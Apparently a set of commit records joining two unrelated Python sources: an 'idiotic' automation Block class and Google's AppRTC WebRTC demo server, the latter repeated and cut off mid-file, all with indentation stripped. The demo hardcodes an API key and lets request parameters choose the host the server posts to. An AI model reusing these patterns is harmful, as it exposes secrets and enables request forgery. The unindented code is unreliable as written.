def create(name, block_config):
block_type = block_config.get("type", "Block")
inputs = block_config.get("inputs", {})
input_to = block_config.get("input_to", [])
if isinstance(input_to, str):
input_to = [input_to]
requires = block_config.get("require", [])
for attr in ("type", "inputs", "require"):
if attr in block_config:
del block_config[attr]
block_cls = Block.REGISTRY[block_type]
res = block_cls(name=name, **block_config)
res.inputs = inputs
res.input_to = input_to
for req in requires:
if req.startswith("node="):
res.require(resource.HostResource(req[5:]))
return res
Add more block stuff
import logging
from typing import Set
from idiotic import resource
from idiotic import config as global_config
import idiotic
import asyncio
if False:
from idiotic.cluster import Cluster
class Block:
REGISTRY = {}
running = False
name = None
inputs = {}
input_to = []
resources = []
config = {}
def __init__(self, name, inputs=None, resources=None, **config):
#: A globally unique identifier for the block
self.name = name
self.inputs = inputs or {}
#: List of resources that this block needs
self.resources = resources or []
#: The config for this block
self.config = config or {}
async def run(self, *args, **kwargs):
await asyncio.sleep(3600)
async def run_while_ok(self, cluster: 'Cluster'):
if self.running:
return
self.running = True
try:
if idiotic.node.own_block(self.name):
await self.init_resources()
while idiotic.node.own_block(self.name) and self.check_resources():
await self.run()
except KeyboardInterrupt:
raise
except:
logging.exception("While running block {}".format(self.name))
self.running = False
if idiotic.node.own_block(self.name):
idiotic.node.cluster.unassign_block(self.name)
idiotic.node.cluster.assign_block(self)
async def init_resources(self):
while not all((r.initialized for r in self.resources)):
await asyncio.sleep(.1)
def require(self, *resources: resource.Resource):
self.resources.extend(resources)
def precheck_nodes(self, config: global_config.Config) -> Set[str]:
all_nodes = set(config.nodes.keys())
for req in self.resources:
nodes = req.available_hosts(config)
if nodes is not None:
all_nodes.intersection_update(set(nodes))
return all_nodes
async def run_resources(self):
await asyncio.gather(*[asyncio.ensure_future(r.run()) for r in self.resources])
def check_resources(self) -> bool:
return all((r.available for r in self.resources))
def try_resources(self):
for r in self.resources:
r.try_check()
async def output(self, data, *args):
if not args:
args = [self.name,]
for source in args:
idiotic.node.dispatch({"data": data, "source": self.name+"."+source})
class InlineBlock(Block):
def __init__(self, name, function=None, **kwargs):
super().__init__(name, **kwargs)
self.function = function
def __call__(self, *args, **kwargs):
if self.function:
self.output(self.function(*args, **kwargs))
class ParameterBlock:
__param_dict = {}
__auto_params = True
def declare_parameters(self, *keys, **items):
self.__auto_params = False
self.__param_dict.update(items)
for key in keys:
if key not in self.__param_dict:
self.__param_dict[key] = None
def __getattr__(self, key):
if key in self.__param_dict:
async def __input(val):
await self._setparam(key, val)
return __input
else:
raise ValueError("Parameter name not declared")
async def parameter_changed(self, key, value):
pass
async def _setparam(self, name, value):
self.__param_dict[name] = value
await self.parameter_changed(name, value)
def formatted(self, value: str):
return value.format(**self.__param_dict)
def get_parameter(self, key):
return self.__param_dict.get(key)
def create(name, block_config):
block_type = block_config.get("type", "Block")
inputs = block_config.get("inputs", {})
input_to = block_config.get("input_to", [])
if isinstance(input_to, str):
input_to = [input_to]
requires = block_config.get("require", [])
for attr in ("type", "inputs", "require"):
if attr in block_config:
del block_config[attr]
block_cls = Block.REGISTRY[block_type]
res = block_cls(name=name, **block_config)
res.inputs = inputs
res.input_to = input_to
for req in requires:
if req.startswith("node="):
res.require(resource.HostResource(req[5:]))
return res
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import logging
import os
import random
import re
import json
import jinja2
import threading
import urllib
import webapp2
from google.appengine.api import urlfetch
from google.appengine.ext import db
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Lock for syncing DB operation in concurrent requests handling.
# TODO(brave): keeping working on improving performance with thread syncing.
# One possible method for near future is to reduce the message caching.
LOCK = threading.RLock()
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'
TURN_BASE_URL = 'https://computeengineondemand.appspot.com'
WSS_HOST = 'apprtc-ws.webrtc.org'
WSS_PORT = '8089'
CEOD_KEY = '4080218913'
def generate_random(length):
word = ''
for _ in range(length):
word += random.choice('0123456789')
return word
def is_chrome_for_android(user_agent):
return 'Android' in user_agent and 'Chrome' in user_agent
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
if 'Android' in user_agent or not 'Chrome' in user_agent:
return 'false'
return 'true'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
config = { 'iceServers': [] };
if ice_transports:
config['iceTransports'] = ice_transports
return config
def add_media_track_constraint(track_constraints, constraint_string):
tokens = constraint_string.split(':')
mandatory = True
if len(tokens) == 2:
# If specified, e.g. mandatory:minHeight=720, set mandatory appropriately.
mandatory = (tokens[0] == 'mandatory')
else:
# Otherwise, default to mandatory, except for goog constraints, which
# won't work in other browsers.
mandatory = not tokens[0].startswith('goog')
tokens = tokens[-1].split('=')
if len(tokens) == 2:
if mandatory:
track_constraints['mandatory'][tokens[0]] = tokens[1]
else:
track_constraints['optional'].append({tokens[0]: tokens[1]})
else:
logging.error('Ignoring malformed constraint: ' + constraint_string)
def make_media_track_constraints(constraints_string):
if not constraints_string or constraints_string.lower() == 'true':
track_constraints = True
elif constraints_string.lower() == 'false':
track_constraints = False
else:
track_constraints = {'mandatory': {}, 'optional': []}
for constraint_string in constraints_string.split(','):
add_media_track_constraint(track_constraints, constraint_string)
return track_constraints
def make_media_stream_constraints(audio, video, firefox_fake_device):
stream_constraints = (
{'audio': make_media_track_constraints(audio),
'video': make_media_track_constraints(video)})
if firefox_fake_device:
stream_constraints['fake'] = True
logging.info('Applying media constraints: ' + str(stream_constraints))
return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
if (param.lower() == 'true'):
constraints['optional'].append({constraint: True})
elif (param.lower() == 'false'):
constraints['optional'].append({constraint: False})
return constraints
def make_pc_constraints(dtls, dscp, ipv6):
constraints = { 'optional': [] }
# Force on the new BWE in Chrome 35 and later.
# TODO(juberti): Remove once Chrome 36 is stable.
constraints['optional'].append({'googImprovedWifiBwe': True})
maybe_add_constraint(constraints, dtls, 'DtlsSrtpKeyAgreement')
maybe_add_constraint(constraints, dscp, 'googDscp')
maybe_add_constraint(constraints, ipv6, 'googIPv6')
return constraints
def make_offer_constraints():
constraints = { 'mandatory': {}, 'optional': [] }
return constraints
def append_url_arguments(request, link):
arguments = request.arguments()
if len(arguments) == 0:
return link
link += ('?' + cgi.escape(arguments[0], True) + '=' +
cgi.escape(request.get(arguments[0]), True))
for argument in arguments[1:]:
link += ('&' + cgi.escape(argument, True) + '=' +
cgi.escape(request.get(argument), True))
return link
def get_wss_parameters(request):
ws_host = request.get('wsh')
ws_port = request.get('wsp')
ws_tls = request.get('wstls')
if not ws_host:
ws_host = WSS_HOST
if not ws_port:
ws_port = WSS_PORT
if ws_tls and ws_tls == 'false':
wss_url = 'ws://' + ws_host + ':' + ws_port + '/ws'
wss_post_url = 'http://' + ws_host + ':' + ws_port
else:
wss_url = 'wss://' + ws_host + ':' + ws_port + '/ws'
wss_post_url = 'https://' + ws_host + ':' + ws_port
return (wss_url, wss_post_url)
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
error_messages = []
# Get the base url without arguments.
base_url = request.path_url
user_agent = request.headers['User-Agent']
# HTML or JSON.
response_type = request.get('t')
# Which ICE candidates to allow.
ice_transports = request.get('it')
# Which TURN transport= to allow.
turn_transports = request.get('tt')
# A HTTP server that will be used to find the right TURN servers to use, as
# described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
turn_base_url = request.get('ts', default_value = TURN_BASE_URL)
# Use "audio" and "video" to set the media stream constraints. Defined here:
# http://goo.gl/V7cZg
#
# "true" and "false" are recognized and interpreted as bools, for example:
# "?audio=true&video=false" (Start an audio-only call.)
# "?audio=false" (Start a video-only call.)
# If unspecified, the stream constraint defaults to True.
#
# To specify media track constraints, pass in a comma-separated list of
# key/value pairs, separated by a "=". Examples:
# "?audio=googEchoCancellation=false,googAutoGainControl=true"
# (Disable echo cancellation and enable gain control.)
#
# "?video=minWidth=1280,minHeight=720,googNoiseReduction=true"
# (Set the minimum resolution to 1280x720 and enable noise reduction.)
#
# Keys starting with "goog" will be added to the "optional" key; all others
# will be added to the "mandatory" key.
# To override this default behavior, add a "mandatory" or "optional" prefix
# to each key, e.g.
# "?video=optional:minWidth=1280,optional:minHeight=720,
# mandatory:googNoiseReduction=true"
# (Try to do 1280x720, but be willing to live with less; enable
# noise reduction or die trying.)
#
# The audio keys are defined here: talk/app/webrtc/localaudiosource.cc
# The video keys are defined here: talk/app/webrtc/videosource.cc
audio = request.get('audio')
video = request.get('video')
# Pass firefox_fake_device=1 to pass fake: true in the media constraints,
# which will make Firefox use its built-in fake device.
firefox_fake_device = request.get('firefox_fake_device')
# The hd parameter is a shorthand to determine whether to open the
# camera at 720p. If no value is provided, use a platform-specific default.
# When defaulting to HD, use optional constraints, in case the camera
# doesn't actually support HD modes.
hd = request.get('hd').lower()
if hd and video:
message = 'The "hd" parameter has overridden video=' + video
logging.error(message)
error_messages.append(message)
if hd == 'true':
video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
elif not hd and not video and get_hd_default(user_agent) == 'true':
video = 'optional:minWidth=1280,optional:minHeight=720'
if request.get('minre') or request.get('maxre'):
message = ('The "minre" and "maxre" parameters are no longer supported. '
'Use "video" instead.')
logging.error(message)
error_messages.append(message)
# Allow preferred audio and video codecs to be overridden.
audio_send_codec = request.get('asc', default_value = '')
audio_receive_codec = request.get('arc', default_value = '')
video_send_codec = request.get('vsc', default_value = '')
video_receive_codec = request.get('vrc', default_value = '')
# Read url param controlling whether we send stereo.
stereo = request.get('stereo', default_value = '')
# Read url param controlling whether we send Opus FEC.
opusfec = request.get('opusfec', default_value = '')
# Read url param for Opus max sample rate.
opusmaxpbr = request.get('opusmaxpbr', default_value = '')
# Read url params audio send bitrate (asbr) & audio receive bitrate (arbr)
asbr = request.get('asbr', default_value = '')
arbr = request.get('arbr', default_value = '')
# Read url params video send bitrate (vsbr) & video receive bitrate (vrbr)
vsbr = request.get('vsbr', default_value = '')
vrbr = request.get('vrbr', default_value = '')
# Read url params for the initial video send bitrate (vsibr)
vsibr = request.get('vsibr', default_value = '')
# Options for controlling various networking features.
dtls = request.get('dtls')
dscp = request.get('dscp')
ipv6 = request.get('ipv6')
# Stereoscopic rendering. Expects remote video to be a side-by-side view of
# two cameras' captures, which will each be fed to one eye.
ssr = request.get('ssr')
# Avoid pulling down vr.js (>25KB, minified) if not needed.
include_vr_js = ''
if ssr == 'true':
include_vr_js = ('<script src="/js/vr.js"></script>\n' +
'<script src="/js/stereoscopic.js"></script>')
debug = request.get('debug')
if debug == 'loopback':
# Set dtls to false as DTLS does not work for loopback.
dtls = 'false'
include_loopback_js = '<script src="/js/loopback.js"></script>'
else:
include_loopback_js = ''
# TODO(tkchin): We want to provide a TURN request url on the initial get,
# but we don't provide client_id until a register. For now just generate
# a random id, but we should make this better.
username = client_id if client_id is not None else generate_random(9)
if len(turn_base_url) > 0:
turn_url = '%s/turn?username=%s&key=%s' %
(turn_base_url, username, CEOD_KEY)
room_link = request.host_url + '/room/' + room_id
room_link = append_url_arguments(request, room_link)
pc_config = make_pc_config(ice_transports)
pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
offer_constraints = make_offer_constraints()
media_constraints = make_media_stream_constraints(audio, video,
firefox_fake_device)
wss_url, wss_post_url = get_wss_parameters(request)
params = {
'error_messages': error_messages,
'is_loopback' : json.dumps(debug == 'loopback'),
'room_id': room_id,
'room_link': room_link,
'pc_config': json.dumps(pc_config),
'pc_constraints': json.dumps(pc_constraints),
'offer_constraints': json.dumps(offer_constraints),
'media_constraints': json.dumps(media_constraints),
'turn_url': turn_url,
'turn_transports': turn_transports,
'stereo': stereo,
'opusfec': opusfec,
'opusmaxpbr': opusmaxpbr,
'arbr': arbr,
'asbr': asbr,
'vrbr': vrbr,
'vsbr': vsbr,
'vsibr': vsibr,
'audio_send_codec': audio_send_codec,
'audio_receive_codec': audio_receive_codec,
'video_send_codec': video_send_codec,
'video_receive_codec': video_receive_codec,
'ssr': ssr,
'include_loopback_js' : include_loopback_js,
'include_vr_js': include_vr_js,
'wss_url': wss_url,
'wss_post_url': wss_post_url
}
if client_id is not None:
params['client_id'] = client_id
if is_initiator is not None:
params['is_initiator'] = json.dumps(is_initiator)
return params
# For now we have (room_id, client_id) pairs are 'unique' but client_ids are
# not. Uniqueness is not enforced however and bad things may happen if RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client(db.Model):
room_id = db.StringProperty()
client_id = db.StringProperty()
messages = db.ListProperty(db.Text)
is_initiator = db.BooleanProperty()
# Constructs the db key for the room. We use this key to create entity groups
# for clients in the same room, so that clients in the same room will be
# strongly consistent.
def get_room_key(room_id):
return db.Key.from_path('Room', room_id)
# Creates a new Client db object and adds it to |client_map|.
def add_client(client_map, room_id, client_id, messages, is_initiator):
room_key = get_room_key(room_id)
client = Client(room_id=room_id,
client_id=client_id,
messages=messages,
is_initiator=is_initiator,
parent=room_key)
client.put()
client_map[client_id] = client
logging.info('Added client ' + client_id + ' in room ' + room_id)
# Removes a client from |client_map| and the datastore.
def remove_client(client_map, client_id):
client = client_map.pop(client_id)
client.delete()
# Returns clients for room.
def get_room_clients(room_id):
room_key = get_room_key(room_id)
return Client.gql('WHERE ANCESTOR IS:ancestor AND room_id=:rid',
ancestor=room_key, rid=room_id)
# Returns dictionary of client_id to Client.
def get_room_client_map(room_id):
clients = get_room_clients(room_id)
client_map = {}
for client in clients:
# Sometimes datastore converts to unicode string. This converts it back
# to match string coming in from request handlers.
client_map[str(client.client_id)] = client
return client_map
class ByePage(webapp2.RequestHandler):
def post(self, room_id, client_id):
with LOCK:
client_map = get_room_client_map(room_id)
if len(client_map) == 0:
logging.warning('Unknown room: ' + room_id)
return
if client_id not in client_map:
logging.warning('Unknown client ' + client_id + ' for room ' + room_id)
return
remove_client(client_map, client_id)
logging.info('Removed client ' + client_id + ' from room ' + room_id)
if LOOPBACK_CLIENT_ID in client_map:
remove_client(client_map, LOOPBACK_CLIENT_ID)
logging.info('Removed loopback client from room ' + room_id)
if len(client_map) > 0:
other_client = client_map.values()[0]
# Set other client to be new initiator.
other_client.is_initiator = True
# This should already be empty, but set it anyway.
other_client.messages = []
# Commit changes.
other_client.put()
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MessagePage(webapp2.RequestHandler):
def write_response(self, result):
content = json.dumps({ 'result' : result })
self.response.write(content)
def send_message_to_collider(self, room_id, client_id, message):
logging.info('Forwarding message to collider for room ' + room_id +
' client ' + client_id)
wss_url, wss_post_url = get_wss_parameters(self.request)
url = wss_post_url + '/' + room_id + '/' + client_id
result = urlfetch.fetch(url=url,
payload=message,
method=urlfetch.POST)
if result.status_code != 200:
logging.error(
'Failed to send message to collider: %d' % (result.status_code))
# TODO(tkchin): better error handling.
self.error(500)
return
self.write_response('SUCCESS')
def post(self, room_id, client_id):
message_json = self.request.body
with LOCK:
client_map = get_room_client_map(room_id)
occupancy = len(client_map)
# Check that room exists.
if occupancy == 0:
logging.warning('Unknown room: ' + room_id)
self.write_response('UNKNOWN_ROOM')
return
# Check that client is registered.
if not client_id in client_map:
logging.warning('Unknown client: ' + client_id)
self.write_response('UNKNOWN_CLIENT')
return
# Check if other client is registered.
if occupancy == 1:
# No other client registered, save message.
logging.info('Saving message from client ' + client_id +
' for room ' + room_id)
client = client_map[client_id]
text = db.Text(message_json, encoding='utf-8')
client.messages.append(text)
client.put()
self.write_response('SUCCESS')
return
# Other client registered, forward to collider. Do this outside the lock.
# Note: this may fail in local dev server due to not having the right
# certificate file locally for SSL validation.
# Note: loopback scenario follows this code path.
# TODO(tkchin): consider async fetch here.
self.send_message_to_collider(room_id, client_id, message_json)
class RegisterPage(webapp2.RequestHandler):
def write_response(self, result, params, messages):
# TODO(tkchin): Clean up response format. For simplicity put everything in
# params for now.
params['messages'] = messages
self.response.write(json.dumps({
'result': result,
'params': params
}))
def write_room_parameters(self, room_id, client_id, messages, is_initiator):
params = get_room_parameters(self.request, room_id, client_id, is_initiator)
self.write_response('SUCCESS', params, messages)
def post(self, room_id):
client_id = generate_random(8)
is_loopback = self.request.get('debug') == 'loopback'
is_initiator = False
messages = []
params = {}
with LOCK:
client_map = get_room_client_map(room_id)
occupancy = len(client_map)
if occupancy == 0:
# New room.
# Create first client as initiator.
is_initiator = True
add_client(client_map, room_id, client_id, messages, is_initiator)
if is_loopback:
add_client(
client_map, room_id, LOOPBACK_CLIENT_ID, messages, False)
# Write room parameters response.
self.write_room_parameters(room_id, client_id, messages, is_initiator)
elif occupancy == 1:
# Retrieve stored messages from first client.
other_client = client_map.values()[0]
messages = other_client.messages
# Create second client as not initiator.
is_initiator = False
add_client(client_map, room_id, client_id, [], is_initiator)
# Write room parameters response with any messages.
self.write_room_parameters(room_id, client_id, messages, is_initiator)
# Delete the messages we've responded with.
other_client.messages = []
other_client.put()
elif occupancy >= 2:
# Full room.
logging.info('Room ' + room_id + ' is full.')
self.write_response('FULL', params, messages)
return
logging.info('User ' + client_id + ' registered in room ' + room_id)
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MainPage(webapp2.RequestHandler):
def get(self):
"""Redirects to a room page."""
room_id = generate_random(8)
redirect = '/r/' + room_id
redirect = append_url_arguments(self.request, redirect)
self.redirect(redirect)
logging.info('Redirecting visitor to base URL to ' + redirect)
class RoomPage(webapp2.RequestHandler):
def write_response(self, target_page, params={}):
template = jinja_environment.get_template(target_page)
content = template.render(params)
self.response.out.write(content)
def get(self, room_id):
"""Renders index.html or full.html."""
# Check if room is full.
with LOCK:
client_map = get_room_client_map(room_id)
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
if len(client_map) >= 2:
logging.info('Room ' + room_id + ' is full')
self.write_response('full.html')
return
# Parse out room parameters from request.
params = get_room_parameters(self.request, room_id, None, None)
self.write_response('index.html', params)
app = webapp2.WSGIApplication([
('/', MainPage),
('/bye/(\w+)/(\w+)', ByePage),
('/message/(\w+)/(\w+)', MessagePage),
('/register/(\w+)', RegisterPage),
# TODO(jiayl): Remove support of /room/ when all clients are updated.
('/room/(\w+)', RoomPage),
('/r/(\w+)', RoomPage),
], debug=True)
Expanded comments regarding it/tt.
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import logging
import os
import random
import re
import json
import jinja2
import threading
import urllib
import webapp2
from google.appengine.api import urlfetch
from google.appengine.ext import db
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Lock for syncing DB operation in concurrent requests handling.
# TODO(brave): keeping working on improving performance with thread syncing.
# One possible method for near future is to reduce the message caching.
LOCK = threading.RLock()
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'
TURN_BASE_URL = 'https://computeengineondemand.appspot.com'
WSS_HOST = 'apprtc-ws.webrtc.org'
WSS_PORT = '8089'
CEOD_KEY = '4080218913'
def generate_random(length):
word = ''
for _ in range(length):
word += random.choice('0123456789')
return word
def is_chrome_for_android(user_agent):
return 'Android' in user_agent and 'Chrome' in user_agent
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
if 'Android' in user_agent or not 'Chrome' in user_agent:
return 'false'
return 'true'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
config = { 'iceServers': [] };
if ice_transports:
config['iceTransports'] = ice_transports
return config
def add_media_track_constraint(track_constraints, constraint_string):
tokens = constraint_string.split(':')
mandatory = True
if len(tokens) == 2:
# If specified, e.g. mandatory:minHeight=720, set mandatory appropriately.
mandatory = (tokens[0] == 'mandatory')
else:
# Otherwise, default to mandatory, except for goog constraints, which
# won't work in other browsers.
mandatory = not tokens[0].startswith('goog')
tokens = tokens[-1].split('=')
if len(tokens) == 2:
if mandatory:
track_constraints['mandatory'][tokens[0]] = tokens[1]
else:
track_constraints['optional'].append({tokens[0]: tokens[1]})
else:
logging.error('Ignoring malformed constraint: ' + constraint_string)
def make_media_track_constraints(constraints_string):
if not constraints_string or constraints_string.lower() == 'true':
track_constraints = True
elif constraints_string.lower() == 'false':
track_constraints = False
else:
track_constraints = {'mandatory': {}, 'optional': []}
for constraint_string in constraints_string.split(','):
add_media_track_constraint(track_constraints, constraint_string)
return track_constraints
def make_media_stream_constraints(audio, video, firefox_fake_device):
stream_constraints = (
{'audio': make_media_track_constraints(audio),
'video': make_media_track_constraints(video)})
if firefox_fake_device:
stream_constraints['fake'] = True
logging.info('Applying media constraints: ' + str(stream_constraints))
return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
if (param.lower() == 'true'):
constraints['optional'].append({constraint: True})
elif (param.lower() == 'false'):
constraints['optional'].append({constraint: False})
return constraints
def make_pc_constraints(dtls, dscp, ipv6):
constraints = { 'optional': [] }
# Force on the new BWE in Chrome 35 and later.
# TODO(juberti): Remove once Chrome 36 is stable.
constraints['optional'].append({'googImprovedWifiBwe': True})
maybe_add_constraint(constraints, dtls, 'DtlsSrtpKeyAgreement')
maybe_add_constraint(constraints, dscp, 'googDscp')
maybe_add_constraint(constraints, ipv6, 'googIPv6')
return constraints
def make_offer_constraints():
constraints = { 'mandatory': {}, 'optional': [] }
return constraints
def append_url_arguments(request, link):
arguments = request.arguments()
if len(arguments) == 0:
return link
link += ('?' + cgi.escape(arguments[0], True) + '=' +
cgi.escape(request.get(arguments[0]), True))
for argument in arguments[1:]:
link += ('&' + cgi.escape(argument, True) + '=' +
cgi.escape(request.get(argument), True))
return link
def get_wss_parameters(request):
ws_host = request.get('wsh')
ws_port = request.get('wsp')
ws_tls = request.get('wstls')
if not ws_host:
ws_host = WSS_HOST
if not ws_port:
ws_port = WSS_PORT
if ws_tls and ws_tls == 'false':
wss_url = 'ws://' + ws_host + ':' + ws_port + '/ws'
wss_post_url = 'http://' + ws_host + ':' + ws_port
else:
wss_url = 'wss://' + ws_host + ':' + ws_port + '/ws'
wss_post_url = 'https://' + ws_host + ':' + ws_port
return (wss_url, wss_post_url)
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
error_messages = []
# Get the base url without arguments.
base_url = request.path_url
user_agent = request.headers['User-Agent']
# HTML or JSON.
response_type = request.get('t')
# Which ICE candidates to allow. This is useful for forcing a call to run
# over TURN, by setting it=relay.
ice_transports = request.get('it')
# Which TURN transport= to allow (i.e., only TURN URLs with transport=<tt>
# will be used). This is useful for forcing a session to use TURN/TCP, by
# setting it=relay&tt=tcp.
turn_transports = request.get('tt')
# A HTTP server that will be used to find the right TURN servers to use, as
# described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
turn_base_url = request.get('ts', default_value = TURN_BASE_URL)
# Use "audio" and "video" to set the media stream constraints. Defined here:
# http://goo.gl/V7cZg
#
# "true" and "false" are recognized and interpreted as bools, for example:
# "?audio=true&video=false" (Start an audio-only call.)
# "?audio=false" (Start a video-only call.)
# If unspecified, the stream constraint defaults to True.
#
# To specify media track constraints, pass in a comma-separated list of
# key/value pairs, separated by a "=". Examples:
# "?audio=googEchoCancellation=false,googAutoGainControl=true"
# (Disable echo cancellation and enable gain control.)
#
# "?video=minWidth=1280,minHeight=720,googNoiseReduction=true"
# (Set the minimum resolution to 1280x720 and enable noise reduction.)
#
# Keys starting with "goog" will be added to the "optional" key; all others
# will be added to the "mandatory" key.
# To override this default behavior, add a "mandatory" or "optional" prefix
# to each key, e.g.
# "?video=optional:minWidth=1280,optional:minHeight=720,
# mandatory:googNoiseReduction=true"
# (Try to do 1280x720, but be willing to live with less; enable
# noise reduction or die trying.)
#
# The audio keys are defined here: talk/app/webrtc/localaudiosource.cc
# The video keys are defined here: talk/app/webrtc/videosource.cc
audio = request.get('audio')
video = request.get('video')
# Pass firefox_fake_device=1 to pass fake: true in the media constraints,
# which will make Firefox use its built-in fake device.
firefox_fake_device = request.get('firefox_fake_device')
# The hd parameter is a shorthand to determine whether to open the
# camera at 720p. If no value is provided, use a platform-specific default.
# When defaulting to HD, use optional constraints, in case the camera
# doesn't actually support HD modes.
hd = request.get('hd').lower()
if hd and video:
message = 'The "hd" parameter has overridden video=' + video
logging.error(message)
error_messages.append(message)
if hd == 'true':
video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
elif not hd and not video and get_hd_default(user_agent) == 'true':
video = 'optional:minWidth=1280,optional:minHeight=720'
if request.get('minre') or request.get('maxre'):
message = ('The "minre" and "maxre" parameters are no longer supported. '
'Use "video" instead.')
logging.error(message)
error_messages.append(message)
# Allow preferred audio and video codecs to be overridden.
audio_send_codec = request.get('asc', default_value = '')
audio_receive_codec = request.get('arc', default_value = '')
video_send_codec = request.get('vsc', default_value = '')
video_receive_codec = request.get('vrc', default_value = '')
# Read url param controlling whether we send stereo.
stereo = request.get('stereo', default_value = '')
# Read url param controlling whether we send Opus FEC.
opusfec = request.get('opusfec', default_value = '')
# Read url param for Opus max sample rate.
opusmaxpbr = request.get('opusmaxpbr', default_value = '')
# Read url params audio send bitrate (asbr) & audio receive bitrate (arbr)
asbr = request.get('asbr', default_value = '')
arbr = request.get('arbr', default_value = '')
# Read url params video send bitrate (vsbr) & video receive bitrate (vrbr)
vsbr = request.get('vsbr', default_value = '')
vrbr = request.get('vrbr', default_value = '')
# Read url params for the initial video send bitrate (vsibr)
vsibr = request.get('vsibr', default_value = '')
# Options for controlling various networking features.
dtls = request.get('dtls')
dscp = request.get('dscp')
ipv6 = request.get('ipv6')
# Stereoscopic rendering. Expects remote video to be a side-by-side view of
# two cameras' captures, which will each be fed to one eye.
ssr = request.get('ssr')
# Avoid pulling down vr.js (>25KB, minified) if not needed.
include_vr_js = ''
if ssr == 'true':
include_vr_js = ('<script src="/js/vr.js"></script>\n' +
'<script src="/js/stereoscopic.js"></script>')
debug = request.get('debug')
if debug == 'loopback':
# Set dtls to false as DTLS does not work for loopback.
dtls = 'false'
include_loopback_js = '<script src="/js/loopback.js"></script>'
else:
include_loopback_js = ''
# TODO(tkchin): We want to provide a TURN request url on the initial get,
# but we don't provide client_id until a register. For now just generate
# a random id, but we should make this better.
username = client_id if client_id is not None else generate_random(9)
if len(turn_base_url) > 0:
turn_url = '%s/turn?username=%s&key=%s' %
(turn_base_url, username, CEOD_KEY)
room_link = request.host_url + '/room/' + room_id
room_link = append_url_arguments(request, room_link)
pc_config = make_pc_config(ice_transports)
pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
offer_constraints = make_offer_constraints()
media_constraints = make_media_stream_constraints(audio, video,
firefox_fake_device)
wss_url, wss_post_url = get_wss_parameters(request)
params = {
'error_messages': error_messages,
'is_loopback' : json.dumps(debug == 'loopback'),
'room_id': room_id,
'room_link': room_link,
'pc_config': json.dumps(pc_config),
'pc_constraints': json.dumps(pc_constraints),
'offer_constraints': json.dumps(offer_constraints),
'media_constraints': json.dumps(media_constraints),
'turn_url': turn_url,
'turn_transports': turn_transports,
'stereo': stereo,
'opusfec': opusfec,
'opusmaxpbr': opusmaxpbr,
'arbr': arbr,
'asbr': asbr,
'vrbr': vrbr,
'vsbr': vsbr,
'vsibr': vsibr,
'audio_send_codec': audio_send_codec,
'audio_receive_codec': audio_receive_codec,
'video_send_codec': video_send_codec,
'video_receive_codec': video_receive_codec,
'ssr': ssr,
'include_loopback_js' : include_loopback_js,
'include_vr_js': include_vr_js,
'wss_url': wss_url,
'wss_post_url': wss_post_url
}
if client_id is not None:
params['client_id'] = client_id
if is_initiator is not None:
params['is_initiator'] = json.dumps(is_initiator)
return params
# For now we have (room_id, client_id) pairs are 'unique' but client_ids are
# not. Uniqueness is not enforced however and bad things may happen if RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client(db.Model):
room_id = db.StringProperty()
client_id = db.StringProperty()
messages = db.ListProperty(db.Text)
is_initiator = db.BooleanProperty()
# Constructs the db key for the room. We use this key to create entity groups
# for clients in the same room, so that clients in the same room will be
# strongly consistent.
def get_room_key(room_id):
return db.Key.from_path('Room', room_id)
# Creates a new Client db object and adds it to |client_map|.
def add_client(client_map, room_id, client_id, messages, is_initiator):
room_key = get_room_key(room_id)
client = Client(room_id=room_id,
client_id=client_id,
messages=messages,
is_initiator=is_initiator,
parent=room_key)
client.put()
client_map[client_id] = client
logging.info('Added client ' + client_id + ' in room ' + room_id)
# Removes a client from |client_map| and the datastore.
def remove_client(client_map, client_id):
client = client_map.pop(client_id)
client.delete()
# Returns clients for room.
def get_room_clients(room_id):
room_key = get_room_key(room_id)
return Client.gql('WHERE ANCESTOR IS:ancestor AND room_id=:rid',
ancestor=room_key, rid=room_id)
# Returns dictionary of client_id to Client.
def get_room_client_map(room_id):
clients = get_room_clients(room_id)
client_map = {}
for client in clients:
# Sometimes datastore converts to unicode string. This converts it back
# to match string coming in from request handlers.
client_map[str(client.client_id)] = client
return client_map
class ByePage(webapp2.RequestHandler):
def post(self, room_id, client_id):
with LOCK:
client_map = get_room_client_map(room_id)
if len(client_map) == 0:
logging.warning('Unknown room: ' + room_id)
return
if client_id not in client_map:
logging.warning('Unknown client ' + client_id + ' for room ' + room_id)
return
remove_client(client_map, client_id)
logging.info('Removed client ' + client_id + ' from room ' + room_id)
if LOOPBACK_CLIENT_ID in client_map:
remove_client(client_map, LOOPBACK_CLIENT_ID)
logging.info('Removed loopback client from room ' + room_id)
